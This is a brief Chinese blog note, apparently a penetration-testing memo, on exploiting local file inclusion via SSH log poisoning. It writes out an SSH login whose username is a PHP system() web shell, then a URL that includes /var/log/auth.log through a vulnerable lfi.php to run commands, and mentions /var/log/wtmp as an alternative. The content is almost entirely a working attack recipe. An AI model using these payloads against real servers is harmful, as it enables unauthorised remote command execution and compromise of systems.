LFI_SSH日志

发表于 | 更新于: | 分类于 | | 阅读次数:
字数统计: 87 | 阅读时长 ≈ 1

登陆SSH:

ssh '<?php system($_GET[‘c’]); ?>'@192.168.1.105

包含文件:

http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls

/var/log/auth.log只有ubuntu系有。 其实对linux,可以包含/var/log/wtmp。一样的效果。有16字符可控,足够了。 只可以没有x权限,要不然ssrf fastcgi就有意思了。

-------------本文结束❤感谢阅读-------------